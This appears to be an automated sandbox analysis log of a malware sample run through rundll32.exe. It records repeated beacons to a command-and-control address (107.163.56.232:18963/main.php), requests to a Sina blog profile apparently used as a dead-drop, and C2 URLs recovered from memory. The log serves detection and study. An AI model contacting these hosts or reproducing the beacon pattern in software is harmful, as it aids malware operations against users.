Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.232:18963Cache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.110:18530/u1129.html
Source: rundll32.exe, 00000004.00000002.3141638484.0000000002FAC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.231:1530//joy.asp?sid=rungnejcndvgnJgFe5vteX8v29
Source: rundll32.exe, rundll32.exe, 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://107.163.56.231:18530/
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.231:18530//joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC
Source: rundll32.exe, rundll32.exe, 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php
Source: rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php$_
Source: rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php%
Source: rundll32.exe, 00000004.00000003.2515717945.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515936731.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php)
Source: rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2821196346.000000000346A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php.
Source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108671185.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108538843.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php3
Source: rundll32.exe, 00000004.00000003.2474378153.000000000656C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php7
Source: rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpA
Source: rundll32.exe, 00000004.00000002.3146735583.000000000628A000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3146573210.000000000606D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpC:
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpE
Source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpF
Source: rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpI
Source: rundll32.exe, 00000004.00000003.2392885098.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2419918524.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515717945.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515936731.0000000003449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2658277587.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpP
Source: rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpS
Source: rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpU
Source: rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpW5
Source: rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.php_
Source: rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpg
Source: rundll32.exe, 00000004.00000002.3142349682.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phph_Xj
Source: rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpj
Source: rundll32.exe, 00000004.00000003.1882444552.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000346D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpk
Source: rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpn_Vj=
Source: rundll32.exe, 00000004.00000003.2392885098.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpq
Source: rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phps
Source: rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpt
Source: rundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271435825.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2331159571.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.000000000346E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2639896838.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2617981049.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004269504.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2618541737.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.000000000346A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948360391.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2189990128.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2311599271.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpz
Source: rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpzF
Source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108671185.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108538843.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.232:18963/main.phpzP
Source: rundll32.exe, 00000004.00000002.3146487020.0000000005FED000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56I
Source: rundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://beacon.sina.com.cn/a.gif?noScript
Source: rundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%so
Source: rundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%ss
Source: rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 00000004.00000003.2556967155.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093.
